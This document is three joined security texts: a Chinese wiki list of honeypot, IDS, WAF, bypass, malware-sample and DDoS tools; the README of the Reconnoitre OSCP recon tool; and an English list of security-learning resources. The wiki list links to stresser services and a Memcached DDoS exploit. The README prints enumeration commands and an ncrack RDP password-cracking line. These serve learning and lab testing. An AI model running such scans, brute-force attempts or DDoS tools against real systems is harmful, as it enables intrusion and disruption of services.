T-POT.里面使用docker技术实现多个蜜罐组合,配合ELK进行研究与数据捕获 - https://github.com/n3uz/t-pot-autoinstall bash.将fork的T-POT蜜罐的一键安装脚本替换为国内加速镜像 - https://www.freebuf.com/sectool/190840.html INTRO.T-Pot多蜜罐平台使用心法 - https://github.com/honeytrap/honeytrap 可扩展蜜罐框架,支持探针部署与高交互蜜罐 - https://github.com/honeynet/beeswarm PY.使用agent探针与蜜罐进行实时交互来引诱攻击者 ### Web蜜罐 - https://github.com/p1r06u3/opencanary_web PY.基于TORNADO的低交互蜜罐。支持自动化安装,目前支持常见的16中协议,现为探针/蜜罐-管理的架构,可以考虑二次开发为探针-沙盒-管理的架构 - https://gitlab.com/SecurityBender/webhoneypot-framework PY3.基于docker和docker-compose,现支持wordpress/drupal - https://github.com/mushorg/snare PY3.web安全蜜罐,可克隆指定Web页面 - https://github.com/netxfly/x-proxy GO.代理蜜罐的开发与应用实战。simple ### 服务蜜罐 - https://github.com/micheloosterhof/cowrie PY2.使用ELK(ElasticSearch,LogStash,Kibana)进行数据分析,目前支持ssh,telnet,sftp等协议 - https://github.com/desaster/kippo PY.蜜罐系统HoneyDrive下的图形化SSH蜜罐。1k。 - https://github.com/thinkst/opencanary PY2.SNMP\RDP\SAMBA蜜罐 - https://github.com/gosecure/pyrdp PY3.RDP MITM蜜罐 - https://gosecure.net/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera/ INTRO.基于PYRDP,打造可记录图像和按键的RDP蜜罐 - https://blog.csdn.net/ls1120704214/article/details/88174003 GO.mysql蜜罐。利用MySQL LOCAL INFILE读取客户端文件漏洞分析并使用Golang编写简易蜜罐;从MySQL出发的反击之路;G:MysqlT,支持大文件无损传输,支持用户验证,支持自定义的 Mysql 版本,随机的盐加密,加上用户验证,让攻击者毫无察觉;G:Rogue-MySql-Server - https://github.com/leeberg/BlueHive PS.利用Active Directory生成用户账户蜜罐 - https://github.com/hacklcs/HFish GO.redis\MYSQL\SSH\GitHub蜜罐 ### 摄像头蜜罐 - https://github.com/alexbredo/honeypot-camera PY.摄像头蜜罐。tornado模拟WEB服务,图片代替视频,可以考虑后期多加点图片和按钮 - https://github.com/EasyDarwin/EasyIPCamera C.RTSP服务器组件用以构建摄像头蜜罐 ### 工控蜜罐 - https://github.com/sjhilt/GasPot 模拟油电燃气工控系统 - https://github.com/djformby/GRFICS IoT工业仿真系统模拟框架,采用MODBUS协议对PLC虚拟机监视和控制 - https://github.com/RabitW/IoTSecurityNAT IoT测试系统,方便快速接入各种设备,进行安全测试 - https://github.com/mushorg/conpot 针对ICS/SCADA的低交互工控蜜罐,模拟Modbus和S7comm - https://github.com/trombastic/PyScada/ PY2.基于Django的SCADA操作管理系统 ## 入侵检测安全防护 - http://m.imooc.com/article/21236 快速自检电脑是否被黑客入侵过(Windows版) - http://www.freebuf.com/articles/system/157597.html 快速自检电脑是否被黑客入侵过(Linux版) - http://www.freebuf.com/rookie/179638.html 服务器入侵溯源小技巧整理 - https://bithack.io/forum/161 intro.如何通过一封恶意邮件追踪幕后黑客组织。邮件掉鱼、溯源、攻击者落地 - https://github.com/chaitin/yanshi C++.长亭偃师(yanshi),雷池(SafeLine)防火墙核心引擎使用到的代码生成工具,规则自动生成判断器械 ### EDR终端防护 - http://edr.sangfor.com.cn/ 深信服。后门检测查杀、僵尸网络隔离等。 - https://documentation.wazuh.com C.C/S架构网络安全平台,支持日志收集、文件监控、恶意软件检测、漏洞极限检测等。 ### 入侵检测系统IPS/IDS/HIDS - https://github.com/baidu/openrasp 基于RASP。Runtime Application Self-Protection,实时应用自我保护,智能针对每个语言定制。1k。greatjob。 - https://github.com/StamusNetworks/SELKS 基于Debian的入侵检测系统,组件包含Suricata IDPS与ELK和Scirius - https://github.com/Security-Onion-Solutions/security-onion Security Onion洋葱安全入侵检测系统。基于Ubuntu,涵盖ELK\Snort\Suricata\Bro等组件,镜像可以作为传感器分布在网络中,以监控多个VLAN和子网。 - https://github.com/ossec/ossec-hids 开源hids(主机入侵检测)堡垒机 - https://github.com/grayddq/HIDS hids基于主机型入侵检测系统,一个人的安全部 - https://github.com/ysrc/yulong-hids 驭龙HIDS是一款由 YSRC 开源的主机入侵检测系统 - https://github.com/DianrongSecurity/AgentSmith-HIDS 点融开源HIDS,开源部分为主机情报收集工具 - https://github.com/snort3/snort3 C++.snort知名NIDS网络入侵检测 - https://github.com/ptresearch/AttackDetection 近期漏洞的snort规则rules - https://github.com/OISF/suricata C.IDS\IPS\NSM安全工具,兼容Snort插件 ### 无线网络入侵检测 - https://github.com/anwi-wips/anwi 无线IDS, 基于低成本的Wi-Fi模块(ESP8266) - https://github.com/SYWorks/waidps PY.Linux下无线网络入侵检测工具 ### 防火墙/waf/网关规则 - http://www.safedog.cn/ 安全狗web防火墙。免费商业。 - http://d99net.net/ 啊D出品D盾防火墙,包含waf与webshel检测功能。免费商业。 - https://www.pfsense.org PHP.防火墙。开源商业 - https://github.com/SpiderLabs/ModSecurity C.跨平台 WAF engine for Apache, IIS and Nginx - https://github.com/SpiderLabs/owasp-modsecurity-crs GO,C.owasp关于ModSecurity等防火墙规则库 - https://github.com/klaubert/waf-fle ModSecurity Web控制台 - https://github.com/xsec-lab/x-waf 适用于中小企业的云waf - https://github.com/jx-sec/jxwaf 基于openrestynginx+lua开发,独创的业务逻辑防护引擎和机器学习引擎,解决传统WAF无法对业务安全进行防护的痛点 - https://github.com/loveshell/ngx_lua_waf 基于lua-nginx-moduleopenresty的web应用防火墙 - https://github.com/Janusec/janusec Golang.应用安全网关,具备WAF、CC攻击防御、证书私钥加密、负载均衡、统一Web化管理等功能。 ## 安全防护绕过Bypass - https://github.com/kirillwow/ids_bypass IDS Bypass 脚本 - https://github.com/milo2012/ipv4bypass 利用ipV6地址绕过waf - https://github.com/3xp10it/bypass_waf 防火墙绕过脚本 - https://github.com/swisskyrepo/PayloadsAllTheThings A list of useful payloads and bypass for Web Application Security and Pentest/CTF - https://github.com/sirpsycho/firecall 直接向CiscoASA防火墙发送命令, 无需登录防火墙后再做修改 - https://blog.xpnsec.com/evading-sysmon-dns-monitoring/ INTRO.规避Sysmon DNS监控 ### CDN识别绕过 - https://github.com/al0ne/Vxscan PY3.目录扫描/js泄露接口,WAF/CDN识别,端口扫描,指纹/服务识别,操作系统识别,弱口令探测,POC扫描,SQL注入,绕过CDN,查询旁站。0.5k。 - https://github.com/boy-hack/w8fuckcdn PY.基于masscan通过扫描全网绕过CDN获取网站IP地址 - https://github.com/3xp10it/xcdn 尝试找出cdn背后的真实ip,3xp10it.github.io 博客 - https://github.com/christophetd/CloudFlair PY.利用dns与api进行cloudflare绕过,获取真实ip,集成censys。G:CloudFail;G:Cloudmare.1K。 - https://github.com/Nitr4x/whichCDN CDN识别、检测 - https://github.com/se55i0n/PortScanner PY2.目标tcp端口快速扫描、banner识别、cdn检测。 - https://github.com/yanxiu0614/subdomain3 py.子域名,IP,CDN信息爆破 ## 协议解析流量分析数据还原 - http://www.colasoft.com.cn/download.php 科来科来网络分析系统/ping工具/mac地址扫描工具/数据包重放工具/数据包生成工具 - https://github.com/wireshark/wireshark LUA.议解析流量分析还原 - http://www.tcpdump.org 网络数据包截获分析 - http://lcamtuf.coredump.cx/p0f3 C.p0f升级版,被动的流量指纹识别TCP/http - https://github.com/zeek/zeek C++.bro的升级版,主要用于对链路上所有深层次的可疑行为流量进行安全监控,为网络流量分析提供了一个综合平台,特别侧重于语义安全监控。 - https://github.com/0x4D31/fatt PY.利用tshark对流量进行解析 - http://tcpick.sourceforge.net TCP流嗅探和连接跟踪工具 - https://github.com/secdev/scapy PY.内置了交互式网络数据包处理、数据包生成器、网络扫描器网络发现和包嗅探工具,提供多种协议包生成及解析插件,能够灵活的的生成协议数据包,并进行修改、解析。 - https://gitee.com/qielige/openQPA 协议分析软件QPA的开源代码,特点是进程抓包、特征自动分析 - https://github.com/zerbea/hcxdumptool 从Wlan设备上捕获数据包 - https://github.com/NytroRST/NetRipper 支持截获像putty,winscp,mssql,chrome,firefox,outlook,https中的明文密码 - https://github.com/shramos/polymorph 支持几乎所有现有协议的实时网络数据包操作框架 - https://github.com/nospaceships/raw-socket-sniffer C.PS.无需驱动抓取Windows流量 ### 常用报文库 - https://wiki.wireshark.org/SampleCaptures/ wireshark维护的报文Captures - https://securityonion.readthedocs.io/en/latest/pcaps.html 安全洋葱维护的回溯pcap列表。securityonion-docs - https://asecuritysite.com/forensics/pcap 站点内容包含密码学与数字取证 - http://packetlife.net/captures/ 站点内容包括协议cheat sheet导图 - http://speed.cis.nctu.edu.tw/pcaplib/ NCTU国立交通大学。聊天/邮件/加解密/文件/网络/流媒体/web - https://www.netresec.com/?page=PcapFiles netresec公司维护。产品包括网络取证与监控,networkminer,caploader,rawcao ### 日志分析与可视化 - https://github.com/grafana/grafana TypeScript,GO.用于可视化大型测量数据的开源程序,提供创建、共享、浏览数据方法与众多功能插件。greatjob。29.5k。 - https://github.com/Cyb3rWard0g/HELK Jupyter Notebooks.基于ELK(Elasticsearch, Logstash, Kibana)的日志威胁分析。1.5K。 - https://github.com/JeffXue/web-log-parser PY.web日志分析工具 - https://github.com/JPCERTCC/LogonTracer JS,PY.根据win登陆记录日志来分析并用图形化展示恶意登陆行为 - https://github.com/jpcertcc/sysmonsearch JS.将Sysmon的日志结果可视化 - https://github.com/olafhartong/sysmon-cheatsheet Sysmon操作手册,各id属性含义 - https://github.com/zhanghaoyil/Hawk-I PY.基于无监督机器学习算法从Web日志中自动提取攻击Payload ### 恶意文件样本 - https://github.com/open-power-workgroup/Hospital 全国莆田系医院名单 - https://github.com/chenerlich/FCL 恶意代码使用的命令行收集 - https://paper.seebug.org/421 常见软件合集与恶意软件分析 - https://github.com/sapphirex00/Threat-Hunting apt恶意软件样本 - https://www.malware-traffic-analysis.net/ 恶意软件样本 - http://dasmalwerk.eu/ 恶意软件样本 - https://lolbas-project.github.io/ - https://github.com/ytisf/theZoo 恶意软件样本 - https://github.com/mstfknn/malware-sample-library 恶意软件样本 - http://99.248.235.4/Library/ 恶意软件样本库。ladder - https://www.connect-trojan.net 恶意软件搜集,查找测试工具 - https://github.com/robbyFux/Ragpicker 恶意软件信息爬取汇总分析 - https://github.com/phage-nz/ph0neutria 恶意软件信息爬取汇总分析 - https://github.com/JR0driguezB/malware_configs 常见恶意配置文件 ### 在线文件检测 - https://app.any.run 可视化在线恶意文件检测 - https://habo.qq.com 在线恶意文件检测 - https://www.virustotal.com 在线文件、网址、域名、IP检测。包含pdns。 - http://r.virscan.org/ 在线杀毒 - https://www.appscan.io 盘古app安全移动软件在线检测 - http://safe.ijiami.cn 爱加密app安全移动软件在线检测 - http://appscan.360.cn 360移动app安全移动软件在线检测 - https://service.security.tencent.com/kingkong 腾讯金刚app安全移动软件在线检测 ### 沙盒检测恶意分析 - https://github.com/cuckoosandbox/cuckoo PY,JS。自动恶意软件分析系统 - https://github.com/euphrat1ca/Panda-Sandbox PY.钟馗沙箱是基于cuckoo的适配国内软件环境的恶意软件分析系统 ### 恶意文件查杀 - https://github.com/mwleeds/android-malware-analysis PY.利用机器学习进行恶意Android安卓应用检测 - https://github.com/he1m4n6a/findWebshell PY.webshell检查工具,可添加后门指纹。 - https://github.com/ym2011/ScanBackdoor 一款简洁的Webshell扫描工具 - https://github.com/erevus-cn/scan_webshell webshell扫描工具 - https://github.com/yassineaddi/BackdoorMan 可对指定目录进行php webshell检测 - https://github.com/nbs-system/php-malware-finder 一款高效率PHP-webshell扫描工具 - https://github.com/emposha/PHP-Shell-Detector 测试效率高达99%的webshell检测工具 - https://github.com/chaitin/cloudwalker GO.CloudWalker(牧云)服务器安全管理平台,主要针对webshell查杀。 - https://github.com/emposha/Shell-Detector Webshell扫描工具,支持php/perl/asp/aspx webshell扫描 - http://www.chkrootkit.org/ rootkit检测工具 - http://rootkit.nl/projects/rootkit_hunter.html rootkit检测工具 - https://github.com/KasperskyLab/klara 卡巴斯基开源基于Yara的分布式恶意软件扫描系统, - https://github.com/botherder/kraken GO.实现的Yara恶意软件扫描器 - https://github.com/netxfly/sec_check 通过信息采集(账户、连接、端口等)与yara扫描进行安全检测 - https://github.com/nao-sec/tknk_scanner yara引擎为基础的恶意软件识别框架 - https://github.com/viper-framework PY2.二进制分析和管理框架,对恶意文件进行分析 - https://github.com/Aurore54F/JaSt 使用语法检测恶意/混淆的JS文件,https://www.blackhoodie.re/assets/archive/JaSt_blackhoodie.pdf - https://github.com/Tencent/HaboMalHunter 哈勃分析系统,linux系统病毒分析及安全测试 - http://www.clamav.net/downloads 病毒查杀软件 - https://github.com/joxeankoret/pigaios 直接对比源代码与编译的二进制文件 - https://github.com/felixweyne/ProcessSpawnControl PS.对恶意程序进行检测与监控 - https://github.com/sfaci/masc 扫描网站中的恶意软件, 以及其他一些网站维护功能 - https://github.com/Neo23x0/munin 依据文件 Hash 从各种在线恶意软件扫描服务提取信息的工具 - https://github.com/1lastBr3ath/drmine 自动化检测网页是否包含挖矿脚本的工具 - https://github.com/alexandreborges/malwoverview simple,将恶意文件进行快速分类 - https://github.com/Neo23x0/Loki 一款APT入侵痕迹扫描器 - https://github.com/target/strelka PY3.通过实时扫描文件进行数据分析和实时监测。 ### 压力测试DDOS/CC/拒绝服务 - https://github.com/ywjt/Dshield DDOS防护 - https://github.com/NewEraCracker/LOIC/ C#.基于Praetox's LOIC project的压测工具,使用mono进行跨平台 - https://github.com/IKende/Beetle.DT C#.分布式压力测试工具 - https://github.com/649/Memcrashed-DDoS-Exploit PY.利用shodan搜索Memcached服务器进行压力测试 - https://github.com/jseidl/GoldenEye PY.DOS测试 - https://github.com/mschwager/dhcpwn PY.DHCP/IP压力测试 - https://github.com/Microsoft/Ethr GO.跨平台,TCP, UDP, HTTP, HTTPS压力测试工具 - https://github.com/Markus-Go/bonesi C.模拟僵尸网络进行ICMP/UDP/TCP/HTTP压测 - https://github.com/ajmwagar/lor-axe RUST,多线程、低带宽消耗的HTTP DoS工具 - https://github.com/EZLippi/WebBench C.网站压力测试,最高并发3万 - https://github.com/jagracey/Regex-DoS RegEx拒绝服务扫描器 - https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit PY.RDP服务远程命令执行/DOS攻击/蓝屏exp - http://www.yykkll.com 压测站评测 - https://defconpro.net # - https://vip-boot.xyz/login.php # - https://rocketstresser.com/login.php 多协议,支持cdn测试 # wiki_FreeConnect - https://github.com/euphrat1ca/wiki_FreeConnect 通讯相关 # wiki_Selfsource - https://github.com/euphrat1ca/wiki_Selfsource 自服务应用在线资源 # wiki_TipSkill - https://github.com/euphrat1ca/wiki_TipSkill 计算机技术相关 *** **个人维护的安全预警维基百科,根据中华人民共和国《网络安全法》相关政策规定,本文章只做安全预警,不被允许通过本文章技术手段进行非法行为,使用技术的风险由您自行承担** - https://github.com/We5ter/Scanners-Box 增加条目,细化分类。4k。 - https://github.com/topics/security GitHub安全类目 - https://www.anquanke.com/opensource GitHub安全类目引擎,热度,时间 - https://xj.hk 星际黑客。8aq.net。先知。freebuf - https://start.me/p/X20Apn 听风者情报源 - https://start.me/p/GE7JQb/osint 情报源 - https://start.me/p/rxRbpo/ti 信息安全导航,APT资源汇总,商业搜索,区块链,CVE号,博客 - https://www.osint-labs.org S.R.P OSINT-Labs开源情报实验室 - https://www.xssav.com 情报网址导航 - https://sec.thief.one 安全热点聚合平台 TheEnd ***
![Reconnnoitre](https://github.com/codingo/Reconnoitre/blob/master/assets/tank-152362_640.png) A reconnaissance tool made for the OSCP labs to automate information gathering and service enumeration whilst creating a directory structure to store results, findings and exploits used for each host, recommended commands to execute and directory structures for storing loot and flags. Contributions are more than welcome! [![Python 3.2|3.6](https://img.shields.io/badge/python-3.2|3.6-green.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPL3-_red.svg)](https://www.gnu.org/licenses/gpl-3.0.en.html) [![Build Status](https://travis-ci.org/codingo/Reconnoitre.svg?branch=master)](https://travis-ci.org/codingo/Reconnoitre) [![Twitter](https://img.shields.io/badge/twitter-@codingo__-blue.svg)](https://twitter.com/codingo_) # Important Reconnoitre although a well loved tool I've maintained for a few years now, in my opinion, pales in functionality to building your own enumeration approach within [Interlace](https://github.com/codingo/Interlace). I strongly recommend anybody looking to take Infosec beyond the OSCP to spend some time looking into this project. # Credit This tool is based heavily upon the work made public in Mike Czumak's (T_v3rn1x) OSCP review ([link](https://www.securitysift.com/offsec-pwb-oscp/)) along with considerable influence and code taken from Re4son's mix-recon ([link](https://whitedome.com.au/re4son/category/re4son/oscpnotes/)). Virtual host scanning is originally adapted from teknogeek's work which is heavily influenced by jobertabma's virtual host discovery script ([link](https://github.com/jobertabma/virtual-host-discovery)). Further Virtual Host scanning code has been adapted from a project by Tim Kent and I, available here ([link](https://github.com/codingo/VHostScan)). # Installation To install Reconnoitre first make a local copy of the repository by performing the following where you wish it to be located: ``` git clone https://github.com/codingo/Reconnoitre.git ``` After you have done this run setup.py with the following: ``` python3 setup.py install ``` After setup has run Reconnoitre will now be in your path (as reconnoitre) and you can launch it anywhere using: ``` reconnoitre <args> ``` # Usage This tool can be used and copied for personal use freely however attribution and credit should be offered to Mike Czumak who originally started the process of automating this work. | Argument | Description | | ------------- |:-------------| | -h, --help | Display help message and exit | | -t TARGET_HOSTS | Set either a target range of addresses or a single host to target. May also be a file containing hosts. | | -o OUTPUT_DIRECTORY | Set the target directory where results should be written. | | -w WORDLIST | Optionally specify your own wordlist to use for pre-compiled commands, or executed attacks. | | --pingsweep | Write a new target.txt file in the OUTPUT_DIRECTORY by performing a ping sweep and discovering live hosts. | | --dns, --dnssweep | Find DNS servers from the list of target(s). | | --snmp | Find hosts responding to SNMP requests from the list of target(s). | | --services | Perform a service scan over the target(s) and write recommendations for further commands to execute. | | --hostnames | Attempt to discover target hostnames and write to hostnames.txt. | | --virtualhosts | Attempt to discover virtual hosts using the specified wordlist. This can be expended via discovered hostnames. | | --ignore-http-codes | Comma separated list of http codes to ignore with virtual host scans. | | --ignore-content-length | Ignore content lengths of specificed amount. This may become useful when a server returns a static page on every virtual host guess. | | --quiet | Supress banner and headers and limit feedback to grepable results. | | --quick | Move to the next target after performing a quick scan and writing first-round recommendations. | | --no-udp | Disable UDP service scanning, which is ON by default. | ## Usage Examples _Note that these are some examples to give you insight into potential use cases for this tool. Command lines can be added or removed based on what you wish to accomplish with your scan._ ### Scan a single host, create a file structure and discover services ``` reconnoitre -t 192.168.1.5 -o /root/Documents/labs/ --services ``` An example output would look like: ``` root@kali:~/# reconnoitre -t 192.168.1.5 --services -o /root/Documents/labs/ __ |"""\-= RECONNOITRE (____) An OSCP scanner [#] Performing service scans [*] Loaded single target: 192.168.1.5 [+] Creating directory structure for 192.168.1.5 [>] Creating scans directory at: /root/Documents/labs/192.168.1.5/scans [>] Creating exploit directory at: /root/Documents/labs/192.168.1.5/exploit [>] Creating loot directory at: /root/Documents/labs/192.168.1.5/loot [>] Creating proof file at: /root/Documents/labs/192.168.1.5/proof.txt [+] Starting quick nmap scan for 192.168.1.5 [+] Writing findings for 192.168.1.5 [>] Found HTTP service on 192.168.1.5:80 [>] Found MS SMB service on 192.168.1.5:445 [>] Found RDP service on 192.168.1.5:3389 [*] TCP quick scan completed for 192.168.1.5 [+] Starting detailed TCP/UDP nmap scans for 192.168.1.5 [+] Writing findings for 192.168.1.5 [>] Found MS SMB service on 192.168.1.5:445 [>] Found RDP service on 192.168.1.5:3389 [>] Found HTTP service on 192.168.1.5:80 [*] TCP/UDP Nmap scans completed for 192.168.1.5 ``` Which would also write the following recommendations file in the scans folder for each target: ``` [*] Found HTTP service on 192.168.1.50:80 [>] Use nikto & dirb / dirbuster for service enumeration, e.g [=] nikto -h 192.168.1.50 -p 80 > /root/Documents/labs/192.168.1.50/scans/192.168.1.50_nikto.txt [=] dirb http://192.168.1.50:80/ -o /root/Documents/labs/192.168.1.50/scans/192.168.1.50_dirb.txt -r -S -x ./dirb-extensions/php.ext [=] java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -H -l /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -r /root/Documents/labs/192.168.1.50/scans/192.168.1.50_dirbuster.txt -u http://192.168.1.50:80/ [=] gobuster -w /usr/share/seclists/Discovery/Web_Content/common.txt -u http://192.168.1.50:80/ -s '200,204,301,302,307,403,500' -e > /root/Documents/labs/192.168.1.50/scans/192.168.1.50_gobuster_common.txt -t 50 [=] gobuster -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -u http://192.168.1.50:80/ -s '200,204,301,307,403,500' -e > /root/Documents/labs/192.168.1.50/scans/192.168.1.50_gobuster_cgis.txt -t 50 [>] Use curl to retreive web headers and find host information, e.g [=] curl -i 192.168.1.50 [=] curl -i 192.168.1.50/robots.txt -s | html2text [*] Found MS SMB service on 192.168.1.5:445 [>] Use nmap scripts or enum4linux for further enumeration, e.g [=] nmap -sV -Pn -vv -p445 --script="smb-* -oN '/root/Documents/labs/192.168.1.5/nmap/192.168.1.5_smb.nmap' -oX '/root/Documents/labs/192.168.1.5/scans/192.168.1.5_smb_nmap_scan_import.xml' 192.168.1.5 [=] enum4linux 192.168.1.5 [*] Found RDP service on 192.168.1.5:3389 [>] Use ncrackpassword cracking, e.g [=] ncrack -vv --user administrator -P /root/rockyou.txt rdp://192.168.1.5 ``` ### Discover live hosts and hostnames within a range ``` reconnoitre -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --hostnames ``` ### Discover live hosts within a range and then do a quick probe for services ``` reconnoitre -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --services --quick ``` This will scan all services within a target range to create a file structure of live hosts as well as write recommendations for other commands to be executed based on the services discovered on these machines. Removing --quick will do a further probe but will greatly lengthen execution times. ### Discover live hosts within a range and then do probe all ports (UDP and TCP) for services ``` reconnoitre -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --services ``` # Requirements This bare requirement for host and service scanning for this tool is to have both `nbtscan` and `nmap` installed. If you are not using host scanning and only wish to perform a ping sweep and service scan you can get away with only installing `nmap`. The outputted _findings.txt_ will often recommend additional tools which you may not have available in your distribution if not using Kali Linux. All requirements and recommendations are native to Kali Linux which is the recommended (although not required) distribution for using this tool. In addition to these requirements outputs will often refer to Wordlists that you may need to find. If you are undertaking OSCP these can be found in the "List of Recommended Tools" thread by g0tmilk. If not then you can find the majority of these online or already within a Kali Linux installation.
# Resources ## Introduction This is a collection of resources for learning computing security. They are mostly interactive, but some sections may contain reading or tools that I feel are worth including. This is not meant to be comprehensive whatsoever, this is meant to just be a collection of stuff that people have found top be useful. Feel free to make pull requests to add whatever you would like. This is listed in no order whatsoever. ## Table of Contents - [Resources](#resources) - [Introduction](#introduction) - [Table of Contents](#table-of-contents) - [Coding](#coding) - [Introduction to Linux](#introduction-to-linux) - [Networking](#networking) - [Infrastructure](#infrastructure) - [Windows Blue Team](#windows-blue-team) - [Web Application Security](#web-application-security) - [Mobile Application Security](#mobile-application-security) - [Network Penetration Testing](#network-penetration-testing) - [CTF](#ctf) - [Reversing &amp; Binary Exploitation](#reversing-amp-binary-exploitation) - [Crypto](#crypto) - [Cheat Sheets](#cheat-sheets) - [Useful Subreddits (needs descriptions)](#useful-subreddits-needs-descriptions) - [Youtube Channels (needs descriptions)](#youtube-channels-needs-descriptions) - [Books/Publishers](#bookspublishers) - [Bug Bountys](#bug-bountys) - [##TODO](#todo) ### Coding - [Introduction to Git](https://git-scm.com/book/en/v2) - An easy guide on learning how to use git - [Code Academy](https://www.codecademy.com/) - Interactive courses for learning new languages. - [Automate the Boring Stuff with Python](https://automatetheboringstuff.com/) - Book on using python to automate repetitive tasks. - [Build your own X](https://github.com/danistefanovic/build-your-own-x) - A list of projects for you to complete in many different languages. - [Free Code Camp](freeCodeCamp.org) - A free website to learn web Development and their [YouTube channel](https://www.youtube.com/channel/UC8butISFwT-Wl7EV0hUK0BQ) has a lot of great tutorials. ### Introduction to Linux - [OverTheWire: Bandit](https://overthewire.org/wargames/bandit/) - War games designed to learn the basics of linux. - [Linux Journey](https://linuxjourney.com/) - Interactive course to learn the basics of linux. ### Networking - [Vinsolev Academy](https://www.youtube.com/watch?v=rIZ61PyDkH8&list=PLR0bgGon_WTKY2irHaG_lNRZTrA7gAaCj) - Introduction to networking course on YouTube. ### Infrastructure - [Introduction to Docker](https://www.katacoda.com/courses/docker/) - Interactive course on understanding docker. - [Introduction to Vagrant](https://psadmin.io/2016/10/04/introduction-to-vagrant/) - Introduction on how to use vagrant for fast deployment of virtual machines. ### Windows Blue Team - [Introduction to Sysintenals](https://docs.microsoft.com/en-us/sysinternals/learn/troubleshooting-book) - A book on the usage of Windows Sysinternals Tools, a powerful set of tools for gaining insight to a windows OS. ### Web Application Security - [OWASP Top 10](https://www.owasp.org/index.php/Main_Page) - A list of the top 10 most common web app vulnerabilities. - [The Web Application Hacker's Handbook 2](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting-ebook/dp/B005LVQA9S) - The bible. There are probably cheaper options out there somewhere on the internet 👀 - [OverTheWire: Natas](https://overthewire.org/wargames/natas/) - Wargames designed to learn the basics of server side web security. - [Damn Vulnerable Web Application](http://www.dvwa.co.uk/) - A beginner PHP/Mysql vulnerable web application. - [OWASP Juice Shop](https://www2.owasp.org/www-project-juice-shop/) - Vulnerable application written in javascript. - [Web Security Academy by Port Swigger](https://portswigger.net/web-security) - Free online web security training by the creators of burp suite. - [Pentester Labs](https://www.pentesterlab.com/) - Interactive web security challenges ranging over many topics. - [Google-Gruyere](https://google-gruyere.appspot.com) - Shows how web application vulnerabilities can be exploited and how to defend against these attacks. ### Mobile Application Security - [Android Security Internals](https://www.amazon.com/Android-Security-Internals-Depth-Architecture/dp/1593275811) - A book focused on android security internals. There are probably cheaper options out there somewhere on the internet 👀 - [OWASP Mobile Testing Guide](https://mobile-security.gitbook.io/mobile-security-testing-guide/) - Mobile Security Testing guide made by OWASP (very in depth). - [Damn Insecure and Vulnerable Android Application](https://github.com/payatu/diva-android) - Intentionally insecure and vulnerable android application. - [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF) - Automated mobile application analysis framework (works better on android than iOS) - [Frida](https://frida.re/) - Dynamic mobile application testing. ### Network Penetration Testing - [Pentester Academy *Paid Access Only*](https://www.pentesteracademy.com/) - Over 1000 videos on security topics, mainly offensive network penetration testing. - [Hack The Box](https://www.hackthebox.eu/) - Pentesting labs, adds new boxes over time. - [IPPSEC’s HTB Walkthroughs](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) - Walkthroughs of retired Hack The Box machines. - [Vulnhub](https://www.vulnhub.com/) - Intentionally vulnerable VMs. - [Intro to Cobalt Strike](https://www.youtube.com/watch?v=q7VQeK533zI&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no) - Cobalt Strike youtube series made by the creator of cobalt strike. - [Active Directory Attack and Defense](https://github.com/infosecn1nja/AD-Attack-Defense) - In depth guide on active directory attack and defense techniques. - [Active Directory Security Blog](https://adsecurity.org/) - Blog on active directory security topics. ### CTF - [CTFtime](https://ctftime.org/about/) - Your one stop shop for finding new CTFs. Includes writeups. - [picoCTF](https://picoctf.com/) - An introduction to CTF. - [TryHackMe](https://tryhackme.com/) - Prebuilt Security Courses in a CTF format. ### Reversing & Binary Exploitation - [Introduction to Arm](https://azeria-labs.com/writing-arm-assembly-part-1/) - Introduction to ARM assembly. - [Introduction to Arm Binary Exploitation](https://azeria-labs.com/writing-arm-shellcode/) - Arm exploit development. - [Live Overflow](https://liveoverflow.com/) - Videos on RE, walkthroughs of CVEs, walkthroughs of CTFs, etc. - [Pwnable.kr](http://pwnable.kr/) - Binary Exploitation challenges - [Embedded Security](https://microcorruption.com/login) - Reverse engineering challenges - [Intro to Android RE](https://maddiestone.github.io/AndroidAppRE/) - Course on getting into android reverse engineering ### Crypto - [Cryptopals](https://www.cryptopals.com/) - A list of crypto challenges. ### Cheat Sheets - [Assorted Code](https://devhints.io) - Helpful cheat sheets for remembering syntax. - [Assorted Pentest](https://dostoevskylabs.gitbooks.io/dostoevskylabs-pentest-notes/content/) - Gitbook of some pentesting notes, slightly outdated. - [List of Windows Logging Cheatsheets](https://www.malwarearchaeology.com/cheat-sheets) - List of useful windows logging cheatsheets - [(Large) Windows Forensics Cheatsheet](https://www.jaiminton.com/cheatsheet/DFIR) - Large Cheetsheet on Windows Forensics ### Useful Subreddits (needs descriptions) - [/r/netsec](https://www.reddit.com/r/netsec/) - [/r/asknetsec](https://www.reddit.com/r/asknetsec/) - [/r/netsecstudents](https://www.reddit.com/r/netsecstudents/) - [/r/cybersecurity](https://www.reddit.com/r/cybersecurity) - [/r/blueteamsec](https://www.reddit.com/r/blueteamsec/) - [/r/ceos3c](https://www.reddit.com/r/ceos3c/) - [/r/computer forensics](https://www.reddit.com/r/computerforensics/) - [/r/cryptography](https://www.reddit.com/r/cryptography/) - [/r/crypto](https://www.reddit.com/r/crypto/) - [/r/encryption](https://www.reddit.com/r/encryption/) - [/r/hackernews](https://www.reddit.com/r/hackernews/) - [/r/hacking](https://www.reddit.com/r/hacking/) - [/r/hacking_tutorials](https://www.reddit.com/r/Hacking_Tutorials/) - [/r/homelab](https://www.reddit.com/r/homelab/) - [/r/newtworking](https://www.reddit.com/r/networking/) - [/r/howtohack](https://www.reddit.com/r/HowToHack/) - [/r/sysadmin](https://www.reddit.com/r/sysadmin/) - [/r/securityblueteam](https://www.reddit.com/r/SecurityBlueTeam/) - [/r/security](https://www.reddit.com/r/security/) ### Youtube Channels (needs descriptions) - [Live Overflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - [Network Chuck](https://www.youtube.com/channel/UC9x0AN7BWHpCDHSm9NiJFJQ) - 